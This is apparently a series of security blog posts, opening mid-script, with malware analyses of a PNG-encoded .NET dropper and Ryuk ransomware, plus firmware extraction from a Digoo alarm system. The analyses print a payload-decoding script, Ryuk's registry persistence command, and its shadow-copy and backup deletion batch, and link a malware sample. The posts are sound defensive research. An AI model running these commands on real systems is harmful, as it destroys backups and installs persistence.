#print ("Row: ", i, len(bmp_img_data[i]), end='')
while (row_count < len(bmp_img_data[0])-4):
	#print (row_count, " ", end="")
		
	for i in range(0,len(bmp_img_data)):
		# AARRGGBB
		R = bmp_img_data[i][row_count]    # 05
		G = bmp_img_data[i][row_count+1]  # 16
		B = bmp_img_data[i][row_count+2]  # 01
		A = bmp_img_data[i][row_count+3]  # 00

		data_array.append(B) 
		data_array.append(G)
		data_array.append(R)
		data_array.append(A)

	row_count += 4

	#print (".. row loaded")

print ("1st bytes")
print_list(data_array[:4], 4)
first_bytes_value = struct.unpack("<I", bytearray(data_array[0:4]))[0]
decode_data = data_array[4:]

##
#### XOR_DEC Start
key_counter = 0

print ("Data Length: ", len(data_array))

print ("")
print ("Pre XORed data")
print_list(decode_data, 50)

outfile = open ("test-prexor.bin", 'wb')
outfile.write(bytearray(decode_data))
outfile.close()

print ("")
print ("XORing Image data")

# below is either B5 or 00 ^ 112
#lastdata = 0x67
static_xor_val = 0x67
lastdata = decode_data[len(decode_data)-1]
key_modifier = lastdata ^ static_xor_val
#key_modifier = 0xb5 ^ 112  # 0xc5
#key_modifier = 0

print("key: ", lastdata, " len: ", len(decode_data)-1, "found key: ", hex(decode_data[len(decode_data)-1]), " mod key: ", key_modifier)

key_counter = 0

for xor_i in range(0,len(decode_data)):

	key_value = key[key_counter]
	output_array.append(decode_data[xor_i] ^ key_modifier ^ key_value)

	if (key_counter < len(plain_key)-1):
		key_counter += 1
	else:
		key_counter = 0

print ("Final Output")
print_list(output_array, print_len)

outfile = open ("test-postxor.bin", 'wb')
outfile.write(bytearray(output_array))
outfile.close()

Decoding Malware Payload encoded in a PNG - "Bank Statement.bat"

locutus@the-collective.net (Ben Mason) — Wed, 27 May 2020 09:00:00 -0400

When looking through my Spam folder, I have run across a few messages with “.bat” files attached to them. Most messages have had different content in the message to entice a victim to open the attachment. I started to investigate each of the attachments and found they were Windows Binaries, and at least two had PNG files in the resources. After doing this initial triage, I wanted to see if the payload of these pieces of malware is encoded in this PNG data and how it was encoded.

I started with a sample named “Bank Statement.bat” with the .NET code that is the least obfuscated and will visit another sample in a later post. In this post, I will reverse engineer the .NET code and uncover the process to extract out the payload encoded in a PNG file embedded in the binary.

Detailed Analysis

First thing, I took a look at the properties of the attached file and determined it was a .NET compiled binary with some suspicious properties such as having a copyright field listing “Apple, Inc.” Some more of the metadata details are shown below.

Architecture:     IMAGE_FILE_MACHINE_I386
Subsystem:        IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 2020-Apr-20 14:27:35
Comments:         QuartzCore 227
CompanyName:      Apple Inc
FileDescription:  QuartzCore
FileVersion:      3.0.0.0
InternalName:     Ly2kW4nOksU0vgv.exe
LegalCopyright:   © 2020 Apple Inc. All rights reserved.
OriginalFilename: Ly2kW4nOksU0vgv.exe
ProductName:      QuartzCore
ProductVersion:   3.0.0.0
Assembly Version: 5.4.1.0

Matching compiler(s):
    Microsoft Visual C# v7.0 / Basic .NET
    Microsoft Visual C++ 8.0
    .NET executable -> Microsoft

Next I ran a binwalk to see if there are is any other obvious hidden content within this file and found there is a PNG file embedded within the binary.

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Microsoft executable, portable (PE)
19329         0x4B81          PNG image, 290 x 290, 8-bit/color RGBA, non-interlaced
19407         0x4BCF          Zlib compressed data, compressed
357216        0x57360         Copyright string: "CopyrightAttribute"

I opened the file in ilSpy and extracted the PNG file from the resources of the binary. When looking at the extracted PNG file I found visually it looks like encoded data. After seeing this image I started to investigate the original binary file to find routines used to decode the PNG file into what I assumed is the payload of the malware. I started to look at the file further in dnSpy and started at the entry point of the binary.

Starting at the entry point method and following the flow through a few more methods, finally finding the start of the decoder functionality. The method below shows the initial routines that load the decoder.

The first items I noticed were the variables text and test2 are references to the PNG resource data. The next variable of note is test3 which looks like it could be a password. This method also contains a blob of encoded data (shown in the HexToString() call on line 9) that has various bytes swapped. Once the blob of data is decoded and returned to its original values then transformed into a string that is next decoded from Base64 into is DLL. The DLL when loaded is named CoreFunctions.dll.

After CoreFunctions.dll is loaded the method “CoreFunctions.Main” is executed. There are four parameters passed to this method, the first two references the PNG data, third what looks like a password, and finally the path to the full binary file. These are the variables I made a note of earlier. This method runs a few routines that decode the PNG data. Next, let’s walk through these method calls:

Read_R reads the PNG file resource into a bitmap object.
Reverse creates an array of each column’s BRGA (Blue, Red, Green, Alpha) color values.
XOR_DEC decodes the values using XOR rotating through the key “XAdgWkK” that is XOR’ed against the last byte of the PNG data.

The image below shows the calls to these methods. They are high lighted in red by the breakpoints.

Once the PNG resource data is decoded into its executable binary data, it is loaded and executed in memory without writing any data to disk.

I have written a python script (that is at the end of this post), that recreates the decoding process and takes in the export of the resource’s PNG data and the key to decodes the payload.

Once this process is completed the decoded payload is named “ReZer0V2” in the metadata of the binary data. I have not done much analysis on the main payload yet other than executing the sample in a sandbox. The sandbox run can be viewed at the following Anyrun link:

https://app.any.run/tasks/577824dc-7d69-4551-86df-9892dc48c49e

I may do further analysis of this sample however this appears to be a few posts out there about this payload:

New AgentTesla variant steals WiFi credentials
Hackers Stealing WiFi Password Using New AgentTesla Malware
New Coronavirus-themed attack uses fake WHO chief emails

Wrap up

I found this an interesting sample to dissect and understand the method used to encode the PNG data and in the future to see if it can be used to decode a second sample I have with a similarly encoded PNG file. The follow-up post about that sample “W.H.O.bat” will be posted up soon. A theory I have about this sample is that it was sent out prematurely and was not fully obfuscated nor was the phishing content of the message fully completed for the campaign, however, it is just a guess.

Sample Download

https://malshare.com/sample.php?action=detail&hash=09cc3eff1d2d8503722bb195ec45d885

IOCs

SHA256: 9253368d34d7342b7c40c42d2df8a862b55bff9e197b92c18a8cdf46a3279c37
SHA1: 9e104d7c818df8e3c47609852580e3f94eb6be53
MD5: 09cc3eff1d2d8503722bb195ec45d885

Decoding Script

import png
import struct

def print_list(thelist, quantity):

	if (quantity == 0):
		quantity = len(thelist)

	#print ("Decimal: ", end="")
	#for i in range(0, quantity):
	#	print (thelist[i], ", ", end="")
	#print ("")
	print ("Hex: ", end="")
	for i in range(0, quantity):
		print (hex(thelist[i]), ", ", end="")
	print ("")
	print ("ASCII: ", end="")
	for i in range(0, quantity):
		print (chr(thelist[i]), ", ", end="")
	print ("")

############
filename = "79fb5.bmp"
# 0x0 , 0x58 , 0x0 , 0x41 , 0x0 , 0x64 , 0x0 , 0x67 , 0x0 , 0x57 , 0x0 , 0x6b , 0x0 , 0x4b
plain_key = "XAdgWkK"
key = bytearray(plain_key.encode("utf-16be"))
print_len = 50
print ("Key: ")
print_list(key, 0)
print ("Key len: ", len(key))

##
#### Load PNG
bmp_full_data = png.Reader(filename=filename).read()
bmp_img_data = list(bmp_full_data[2])

##
#### Reverse Start
data_array = []
output_array = []

print ("")
print ("Loading Image data")
print ("IMG height: ", len(bmp_img_data))
row_count = 0
#print ("Row: ", i, len(bmp_img_data[i]), end='')
while (row_count < len(bmp_img_data[0])-4):
	#print (row_count, " ", end="")
		
	for i in range(0,len(bmp_img_data)):
		# AARRGGBB
		R = bmp_img_data[i][row_count]    # 05
		G = bmp_img_data[i][row_count+1]  # 16
		B = bmp_img_data[i][row_count+2]  # 01
		A = bmp_img_data[i][row_count+3]  # 00

		data_array.append(B) 
		data_array.append(G)
		data_array.append(R)
		data_array.append(A)

	row_count += 4

	#print (".. row loaded")

print ("1st bytes")
print_list(data_array[:4], 4)
first_bytes_value = struct.unpack("<I", bytearray(data_array[0:4]))[0]
decode_data = data_array[4:]

##
#### XOR_DEC Start
key_counter = 0

print ("Data Length: ", len(data_array))

print ("")
print ("Pre XORed data")
print_list(decode_data, 50)

outfile = open ("test-prexor.bin", 'wb')
outfile.write(bytearray(decode_data))
outfile.close()

print ("")
print ("XORing Image data")

# below is either B5 or 00 ^ 112
key_modifier = 0xb5 ^ 112  # 0xc5
#key_modifier = decode_data[len(decode_data)-1] ^ 112
#key_modifier = 0

print(len(decode_data)-1, hex(decode_data[len(decode_data)-1]), key_modifier)

key_counter = 0

for xor_i in range(0,len(decode_data)):

	key_value = key[key_counter]
	output_array.append(decode_data[xor_i] ^ key_modifier ^ key_value)

	if (key_counter < len(plain_key)-1):
		key_counter += 1
	else:
		key_counter = 0


print ("Final Output")
print_list(output_array, print_len)

outfile = open ("test-postxor.bin", 'wb')
outfile.write(bytearray(output_array))
outfile.close()

Ryuk Malware - Analysis and Reverse Engineering

locutus@the-collective.net (Ben Mason) — Wed, 08 Apr 2020 10:07:00 -0400

Summary

In this post, I will reverse and analyze a Ryuk malware sample. Ryuk is pretty well-known ransomware that encrypts the contents of a victim’s hard drive. The sample uses two executable stages, one that determines if the system is a 32bit or a 64bit system, then extracts out the appropriate second stage executable onto the file system and executes the second stage. The second stage then attempts to gain persistence through creating a registry key and then finally injects an encryption process into another process and starts to encrypt the file systems leaving behind a Ransom note for the user to find. In the rest of this post, I will write up a detailed analysis and reverse engineering of the Ryuk malware.

Full Analysis

Initial discovery

I downloaded the sample from this site. The first thing that I wanted to ensure that the file that I was working with was what I was expecting. I sent the hash to Virustotal, and it identified by the majority of engines as Ryuk.

VirusTotal

Now that I knew I was looking at the correct file I validated the type of executable, finding it was a Windows PE file.

$ file loader.bin
 loader.bin: PE32 executable (GUI) Intel 80386, for MS Windows

Then I ran binwalk to see if there was embedded content, and I found there are 2 PE headers embedded in this file in addition to the main executable.

$ binwalk loader.bin
 DECIMAL       HEXADECIMAL     DESCRIPTION
 0             0x0             Microsoft executable, portable (PE)
 70576         0x113B0         Microsoft executable, portable (PE)
 242704        0x3B410         XML document, version: "1.0"
 245168        0x3BDB0         Microsoft executable, portable (PE)

After some initial light investigation, I dug into the file with Ghidra and x64dbg to build out the flow of the executables. Initially, we will take a look at the first stage that extracts the main payload.

Stage 1

This initial stage has a pretty simple program flow and accomplished a pretty simple task of extracting and executing the appropriate PE or PE+ file for the architecture. The below flowchart gives an overview of the execution path of this stage.

The first task this stage does is to determine the version of Windows the system is running. It does this to determine the location of the default user profile directory (“\Users\Public” or “\Documents and Settings\Default User”). After finding the directory it generates a random 5 character file name, which will have .exe appended to it and used as the file name of the second stage.

The function CreateFileW is run with the created filename to create a handle to write the second stage. However, before writing the second stage data, a procedure using IsWoW64Process is run to determine if the system using a 32bit or 64bit operating system then writes a PE executable for 32bit systems or PE+ executable for 64bit systems. (This process is shown in the Ghidra decompilation) Once the file data is written, ShellExecuteW is called with the file name of the first stage listed as an argument to run the newly created executable, and move on to stage 2.

Stage 2

In my analysis, I used the PE+ binary code to do my detailed work. I did some cursory analysis of the PE binary to make sure there were not any apparent differences in functionality and found it was essentially the same as the PE+ counterpart from a functionality perspective.

bin0.bin: PE32+ executable (GUI) x86-64, for MS Windows
$ ls -l bin0.bin
 -rw-r--r--@ 1 xxx  xxx  174592 Feb 22 00:19 bin0.bin
SHA-1: 92e331e1e8ad30538f38dd7ba31386afafa14a58

I found there are two primary sections of code that I will refer to as WinMain located at memory address 0x140001c80 and RansonMain, which is located at address 0x140002a70. WinMain handles the setup of execution for the encryption section in RansonMain.

WinMain

I called this function WinMain as it appears to align with the traditional WinMain function in C. This function and its callees as already mentioned setup and inject the encryption processes to start the execution of RansomMain. The following flow chart lays out the flow of this section.

The first activity WinMain does is to delete the first stage. The file is deleted by passing the filename of the first stage as a command-line argument and then calling a function to delete the file. Next, WinMain adds a registry key to the run the second stage on the boot of Windows. I would guess this is in order to obtain a level of persistence. It uses the Windows command line to add the key, calling ShellExecuteW to run the command.

cmd.exe /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\IEUser\Desktop\ryuk\aSEzD.exe" /f

The example command created the following in the registry on my test system.

After creating the registry key, WinMain then runs a function to check and enable SeDebugPrivilege on the Stage 2 process to ensure it has the correct permission level. This permission is needed to manipulate other processes on this system. Next it a function loops through and creates a list of running processes on the system creating a data structure consisting of a list of 0x210 byte structures laid out in the format:

 +-------------------------------+
 |   Process Name      0x208B    |
 +---------------+---------------+
 |   PSID 0x1B   |   Perm 0x1B   |
 +---------------+---------------+

The “Perm” contains permission level it was able to acquire to the process. There are 4 permissions levels

0	Can’t open process
1	has NT AUTHORITY
2	No NT AUTHORITY
5	Can Get Token

After collecting the list of processes, it loops through them and checks a few things. First, it checks the process name to see if it matches “CSRSS.EXE,” “EXPLORER.EXE,” or “LSAAS.EXE” (yup, the last one is a typo in the sample). Then it checks the permissions it was able to get on the process if it’s 5 (Can get Token) or 1 (Has NT Authority). After passing both of these checks, it will call a function to inject the RansomMain into the process. I have named this function WriteProcMemory.

WriteProcMemory is a pretty simple function, and it takes a process name allocates memory in the process then calls CreateRemoteThread to create a thread in that process to execute RansomMain. The loop processes the entire list of processes gathered. After all the processes have been processed, it will execute a function to decode function pointers and then directly execute RansomMain before ending the program. The final 2 steps are similar to what occurs in the injected process and I will cover these functions in more depth.

Remote Thread and RansomMain

The Injected thread first decodes various function pointers used throughout the thread. The majority of the Windows API calls in RansomMain are done via calls by reference to these encoded references. The decoder function located at 0x140005b10, and the key that encodes the various function call is itself encoded and is decoded by an XOR loop at 140005b9a. The code in the next screenshot shows the routine that is used to decode the key.

After running the above code in a debugger, I grabbed the decoded key and wrote a python function to decode the rest of the function call names. The string variable in this code is a list of the hex values in the encoded library and function names.

def decode(string):
    key_position_1 = 0
    key_position_2 = 0 
    # Key at: 0x1400293c4
    # ASCII: aZIiQ
    keys = [0x62, 0x5a, 0x49, 0x69, 0x51]
    
    print (len(string), len(keys))
    while key_position_1 < len(string):
        if string[key_position_1] != 0x0:
            decoded = string[key_position_1] ^ keys[key_position_2]
            print (chr(decoded), end = "")

            if key_position_2 < len(keys)-1:
                key_position_2 += 1
            else:
                key_position_2 = 0
        key_position_1 += 1
        
decode(string)

Here is a sample of some of the decoded calls shown in the Ghidra disassembler view.

After all of the function calls are decoded, and the function call addresses are resolved into memory. The next function attempts to write a file named “sys” into the default system home directory (“\Users\Public” or “\Documents and Settings\Default User” depending on OS version). If it is unable to create or open the file the function will wait until it can write the file or terminate the process. Otherwise, if it is successful, it will move forward on to RansomMain.

RansomeMain is the main show and handles all of the encryption activities following this general flow in this chart.

The first main activity this function does is to set up an encryption context using legacy Windows encryption APIs. The parameters used in CryptoAquireContextW to create the container are:

Container name: AES_Unique_
Provider: Microsoft Enhanced RSA and AES Cryptographic Provider
Flags: Vary depending on the OS version

After the context is set up, the function loads a RSA Public key from the file location 0x1400293d0. The key is stored as a PUBLICKEYBLOB with the following parameters:

Key Algorithm 0xA400 – RSA public key exchange algorithm
DSS version: 2
Key length: 2048 bit key

The key embedded in the sample Base64 encoded is:

nWvywVbBvz4AYDfaAouzpqlRr9aOb+wCl5MYJPQzMGNhAE+CDfDm4DPIUp0Ud8m/xty5d7N2jiqJbFC04jZf0Kat3AaJXnMeZfXPAQzJKXtMQfnLL /ZQOX4KeDFJ+zfnflDEcKYuQARXxMbJVWBXu7vagRd+8TBJ /6L5FsFWwA9KRr5blLkgRHdfqkLhGaWOqTSUF9btcWdyOg2We5g5ByoxPKtoqO9NjOb/witnj+TpGHeahzwpHzxAsOEisWYneR3RkhSvNh/Qs8OiVwiHFFeBdRJRkEC6UtlTj7obLi55Y7mztJwMI4TbdnMReGiMRlGHuHN9aKKhQssMFKpA==

The next function decodes the ransom note. These values are all encoded using XOR with static keys. There are two different keys used one for the email address and a Bitcoin address. A second key used for the main ransom note. The email addresses and Bitcoin address contained in this sample are:

Memory Location	Decoded Data
0x140029b20	WayneEvenson@protonmail.com
0x140029980	WayneEvenson@tutanota.com
0x1400249e8	14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk

My assumption is they made the email address and bitcoin address separate from the rest of the note so they can be swapped out easily, keeping the bulk of the text the same. Next, the function decodes the main part of the ransom note. The below python code decodes both the email and Bitcoin strings along with the ransom note itself.

ARRAY_140029b20 = [ ** email 1 in hex ** ]
ARRAY_140029980 = [ ** email 2 in hex **  ]
ARRAY_1400249e8 = [ ** btc addr in hex **  ] 

# 140029500 - 140029798
DAT_RyukReadMe_txt_Buffer = [ **ransom note in hex** ]

# 14001f990
Decode_key_1 = [ **snip key in hex** ]

# 14001f9f0
Decode_key_2 = [ **snip key in hex** ]

s_BTC_wallet_140029868 = "BTC wallet:"
s_No_system_is_safe_140029b40 = "No system is safe"
s_Ryuk_140028e18 = "Ryuk\n "

for i in range(0, 27):
    if (i & 1 == 0 ):
        key = DAT_RyukReadMe_txt_Buffer[i]
    else:
        key = Decode_key_1[i]
    print (chr(ARRAY_140029b20[i] ^ key), end = "")
print ("")

for i in range(0, 0x19):
    if (i & 1 == 0 ):
        key = DAT_RyukReadMe_txt_Buffer[i]
    else:
       key = Decode_key_1[i]
    print (chr(ARRAY_140029980[i] ^ key), end = "")
print ("")

for i in range(0, 0x22):
    if (i & 1 == 0 ):
        key = DAT_RyukReadMe_txt_Buffer[i]
    else:
        key = Decode_key_1[i]
    print (chr(ARRAY_1400249e8[i] ^ key), end = "")
print ("")
print ("")
print ("")
for i in range(0, len(DAT_RyukReadMe_txt_Buffer)):
    print (chr(DAT_RyukReadMe_txt_Buffer[i] ^ Decode_key_2[i]), end="")

After everything is decoded all the text is put together to create the following ransom note that is written to directories where files are encrypted.

Once the ransom note is decrypted RansomMain function gathers a list of all of the file systems on the system. The file system list is collected using the GetLogicalDrives function and checking the file system type using GetDriveTypeW. Then a called function starts to walk through the file system and encrypting the contents of directories.

As the function loops through the file system, it skips over directories named “Windows” , “AhnLabs”, “Chrome”, “Mozilla,” “$Recycle.Bin,” and “WINDOWS.” Once the list of files in a directory has collected, it will write a copy of the ransom note to a file named RyukReadMe.txt then start a Thread to encrypt each file in the directory. The encryption uses the AES 256 algorithm via the Microsoft AES Cryptographic Provider. It will continue this process until the local file systems are encrypted.

Next, it enumerates a list of network shares then follows the same process to encrypt those shares. The list of network shares enumerated using the WNetOpenEnum and WNetEnumResourceW function calls. After the list of shares is generated the network shares are encrypted using the same functions that were used to encrypt local file systems and write the ransom note.

Once the encryption loops are completed, the final call deletes the system shadow copy by creating a file named windows.bat and placing the below command in it and executing it.

"vssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\r\ndel /s /f /q c:\<em>.VHD c:\</em>.bac c:\<em>.bak c:\</em>.wbcat c:\<em>.bkf c:\Backup</em>.* c:\backup<em>.</em> c:\<em>.set c:\</em>.win c:\<em>.dsk\r\ndel /s /f /q d:\</em>.VHD d:\<em>.bac d:\</em>.bak d:\<em>.wbcat d:\</em>.bkf d:\Backup<em>.</em> d:\backup<em>.</em> d:\<em>.set d:\</em>.win d:\<em>.dsk\r\ndel /s /f /q e:\</em>.VHD e:\<em>.bac e:\</em>.bak e:\<em>.wbcat e:\</em>.bkf e:\Backup<em>.</em> e:\backup<em>.</em> e:\<em>.set e:\</em>.win e:\<em>.dsk\r\ndel /s /f /q f:\</em>.VHD f:\<em>.bac f:\</em>.bak f:\<em>.wbcat f:\</em>.bkf f:\Backup<em>.</em> f:\backup<em>.</em> f:\<em>.set f:\</em>.win f:\<em>.dsk\r\ndel /s /f /q g:\</em>.VHD g:\<em>.bac g:\</em>.bak g:\<em>.wbcat g:\</em>.bkf g:\Backup<em>.</em> g:\backup<em>.</em> g:\<em>.set g:\</em>.win g:\<em>.dsk\r\ndel /s /f /q h:\</em>.VHD h:\<em>.bac h:\</em>.bak h:\<em>.wbcat h:\</em>.bkf h:\Backup<em>.</em> h:\backup<em>.</em> h:\<em>.set h:\</em>.win h:\*.dsk\r\ndel %0"

After the shadow copy is removed the processes exits and Ryuk has done it’s job encrypting all of the data it can find.

Wrap up

To summarize and restate what we just covered, Ryuk has two major stages. The first determines if the OS is 64bit or 32 bit then extracts the appropriate second stage that decodes internal function and other strings it will use. Next, it loops through the local file systems encrypting the majority of files, then it moves on to network shares encrypting the contents of those shares. Finally, before the process ends, it deletes the Volume Shadow Copy.

Ryuk is quite destructive using Windows built-in encryption APIs and a public key to encrypt the files. This is much tougher to break than other malware that uses roll your own encryption techniques. I am not the first nor the last to analyze this piece of malware, but it has been a fun challenge to walk through it and reverse engineer Ryuk’s functionality in detail. To close out this post, I will list out some of the indicators of compromise (IOC) that I found in my analysis.

IOC

1st Stage Binary

File Size: 393216  
MD5: 5ac0f050f93f86e69026faea1fbb4450  
SHA-1: 9709774fde9ec740ad6fed8ed79903296ca9d571

2nd Stage Binaries
64 bit PE+

File Size: 174592  
MD5: 31bd0f224e7e74eee2847f43aae23974  
SHA-1: 92e331e1e8ad30538f38dd7ba31386afafa14a58 bin0.bin

32bit PE

File Size: 143440  
MD5: 6391b5b9a29d3fd73dab4c9a8a5fc348  
SHA-1: 057aa7a708e0011abc1d4b990999f072a77d1057 bin1.bin

Registry Key

Location: \\HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\  
Name: “svchos”  
Type: REG\_SZ  
Value: \[Second Stage File name and location\]

Other Files ([] is a random 5 character string)

RyukReadMe.txt   
\\users\\Public\\\[\].exe   
\\Documents and Settings\\Default User\\\[\].exe  
\\Documents and Settings\\Default User\\sys   
\\users\\Public\\sys   
\\users\\Public\\finish   
\\Documents and Settings\\Default User\\finish   
\\Users\\Public\\window.bat

Decoded Strings

WayneEvenson@protonmail.com  
WayneEvenson@tutanota.com  
BTC Address: 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk

Presentation: Introduction to (Binary) Reverse Engineering

locutus@the-collective.net (Ben Mason) — Fri, 24 Jan 2020 09:00:00 -0500

Below are the slides my presentation at the Maine OWASP chapter meetup on Janurary 23, 2020.

Link to Slides

DIGOO DG-HOSA – Part 2 Firmware Extraction and Initial Analysis

locutus@the-collective.net (Ben Mason) — Mon, 30 Dec 2019 10:00:00 -0500

This is a continuation from a previous post: https://ben.the-collective.net/hugo/posts/2019-08-21-digoo-dg-hosa-part-1-teardown-and-hardware/

Finding the connections

Now that I have the lay of the land for the device (which that I outlined in my previous part of the series) the first thing I looked for is the debugging connections for the main GigaDevices processor. This processor looks to be the primary processor for the device and has the most valuable firmware. Since the board was well labeled I didn’t need to use any tools like a JTAGulator or an Arduino board with the JTAGenum firmware to identify which test points are the debug interface. I was able to find the SWDIO, SWCLK, +3.3 and GND connections for the Serial Wire Debug (SWD) debug interface. This is the same interface that STM32 chips utilize and it provides similar functionality as a “standard” JTAG interface.

Serial Wire Debug (SWD) is a 2-pin (SWDIO/SWCLK) electrical alternative JTAG interface that has the same JTAG protocol on top. SWD uses an ARM CPU standard bi-directional wire protocol, defined in the ARM Debug Interface v5. This enables the debugger to become another AMBA bus master for access to system memory and peripheral or debug registers.

https://www.silabs.com/community/mcu/32-bit/knowledge-base.entry.html/2014/10/21/serial_wire_debugs-qKCT

In the image below you can see the debug test points along with the with wires soldered to them to connect to my debugger. The proximity of these test points to the GD32F105 processor, it is a good assumption that they are for that chip.

As a bonus also pictured is my wire soldered around the switch on the upper left to bypass the intrusion detection function.

For this project, I soldered wires to most of the test points across the board. This board has a ton of test points that maybe be useful to monitor signals over the course of this project. To manage the wiring for all of the test points on this project I created a test jig to keep the setup organized. The next picture shows my test setup.

This jig was inspired by some tweets long ago by cybergibbons where he recommended doing something similar. Once all of the test wires were in place, I hooked up my ARM debugger of choice the Black Magic Probe (BMP) from 1BitSquared and the process to started to extract the firmware.

Initially, I tried to power the board using the BMP but I found that the BMP was not able to provide enough power to the board to support the minimum number of peripherals. The BMP can only supply 100mA of power. Some lights would come on but gdb would not detect any devices connected. I ended up adding the USB connection you see in the photo to provide more power to the board.

Now that everything is powered and connected I was able to use gdb to attach to the board and dump the firmware of the device.

Extracting the firmware: gdb

The first step is to attach my local arm gdb build to the Blackmagic Probe which acts as a remote gdb server. I always find the Useful GDB commands wiki page in the BMP wiki to be very useful in refreshing my memory. The syntax and terminal output I started with are:

╭─locutus@theborgcube ~/Projects/RE-Digoo_DG-HOSA
╰─$ arm-none-eabi-gdb -ex "target extended-remote /dev/tty.usbmodemC2D9BBC31"
 GNU gdb (GNU Tools for ARM Embedded Processors) 7.10.1.20160616-cvs
 Copyright (C) 2015 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <a href="http://gnu.org/licenses/gpl.html">http://gnu.org/licenses/gpl.html</a>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "--host=x86_64-apple-darwin10 --target=arm-none-eabi".
 Type "show configuration" for configuration details.
 For bug reporting instructions, please see:
 <a href="http://www.gnu.org/software/gdb/bugs/">http://www.gnu.org/software/gdb/bugs/</a>.
 Find the GDB manual and other documentation resources online at:
 <a href="http://www.gnu.org/software/gdb/documentation/">http://www.gnu.org/software/gdb/documentation/</a>.
 For help, type "help".
 Type "apropos word" to search for commands related to "word".
 /Users/locutus/.gdbinit:1: Error in sourced command file:
 No symbol table is loaded.  Use the "file" command.
 Remote debugging using /dev/tty.usbmodemC2D9BBC31
 (gdb) monitor
 Black Magic Probe (Firmware v1.6.1-1-g74af1f5) (Hardware Version 3)
 Copyright (C) 2015  Black Sphere Technologies Ltd.
 License GPLv3+: GNU GPL version 3 or later <a href="http://gnu.org/licenses/gpl.html">http://gnu.org/licenses/gpl.html</a>
 (gdb) monitor swdp_scan
 Target voltage: 3.3V
 Available Targets:
 No. Att Driver
  1      STM32F1 high density
 (gdb) attach 1
 Attaching to Remote target
 0x08007b46 in ?? ()
 (gdb) dump binary memory firmware.bin 0x08000000 0x080FFFFF
 Cannot access memory at address 0x8080000

When I ran into the error at the end of the terminal output I was a bit confused until I looked at this memory layout of the chip in the datasheet and saw that I was overrunning the size of the first flash memory bank.

datasheet

After I adjusted the GDB dump command…

(gdb) dump binary memory firmware.bin 0x08000000 0x0807FFFF
(gdb)

…success!

╭─locutus@theborgcube ~/Projects/RE-Digoo_DG-HOSA
╰─$ ls -l firmware.bin
 -rw-r--r--  1 locutus  staff  524287 Nov 16 14:13 firmware.bin

I now have a copy of the firmware we can do some initial analysis of it.

Initial Analysis

First thing first like with any binary I start by running strings to get some hints on the contents of the binary and make sure it is a valid dump. I found a ton of strings showing this is a valid dump of the firmware, most notably the same markings on the board showing up in the firmware:

PCB:PG-103 VER2.3/FIRMWARE: 103-2G-J

and other strings indicate that they are using the Real-Time Operating system (RTOS) OS-III (link2) as the operating system. The Micrium site does not specifically list the Gigadevices chip in the supported just the general ARM Cortex-M3 cores as supported.

Seeing this let me know that reversing this firmware will be much more complex then I had hoped. The RTOS will add a lot of scheduling and random functions to look into. After this initial investigation, it is time to load the firmware into Radare. I used the following command when loading it up:

r2 -a arm -b 16 -m 0x0800c000 firmware.bin

This syntax sets the proper processor (-a) and CPU register size (-b) and starting memory location (-m). Once loaded I run an initial analysis job to see what Radare finds.

[0x0800c000]> aaa
 [x] Analyze all flags starting with sym. and entry0 (aa)
 [x] Analyze function calls (aac)
 [x] find and analyze function preludes (aap)
 [x] Analyze len bytes of instructions for references (aar)
 [x] Check for objc references
 [x] Check for vtables
 [x] Finding xrefs in noncode section with anal.in=io.maps
 [x] Analyze value pointers (aav)
 [x] Value from 0x0800c000 to 0x0808bfff (aav)
 [x] 0x0800c000-0x0808bfff in 0x800c000-0x808bfff (aav)
 [x] Emulate code to find computed references (aae)
 [x] Type matching analysis for all functions (aaft)
 [x] Use -AA or aaaa to perform additional experimental analysis.

[0x0800c000]> afl |wc -l
      844

Radare found 844 functions without any hints or adjustments. In some of the work I have already done, there are even more than 844 functions. Now that I have a copy of the firmware, I’ve dived in and started analyzing the firmware which as of writing is still a work in progress. As I get further along I will cover some of the techniques I am using to take apart this firmware.

DIGOO DG-HOSA - Part 1 (Teardown and Hardware)

locutus@the-collective.net (Ben Mason) — Wed, 21 Aug 2019 09:00:28 -0400

This project started with the idea of purchasing a cheap security system off one of the Chinese stores. After a little hunting, I found Digoo DG HOSA 433MHz 2G&GSM&WIFI Smart Home Security Alarm System Protective Shell Alert with APP which looked interesting so picked one up to tear apart. I was curious about how various communication methods were implemented.

This is the first part of this adventure the next part will be exploring the firmware of the device. With that let’s take a look at the hardware.

Teardown Time

After the device showed up, I quickly got down to taking the device apart. In my haste, I didn’t take many good photos of it intact. The front side of the board is straight forward; it contains the screen, button array for all user input, and a lot of useful test points. The front side is pictured below.

The most significant information found on the front side of the board is the notation PG-103, which is also found in the firmware (spoiler). After some searching, I found this device is also branded as the PGST PG-103. This kind of rebranding of hardware is not unusual for a lot of Chinese devices.

Now switching to the back of the board, which is the business side of the board with the main chips and modules providing the various communication methods. When opening that device I encountered the intrusion detection button. This button causes the device to go into an alarm mode and require a reset of the device to come back online. For my testing, I bypassed this button bridging both sides of it.

Component List

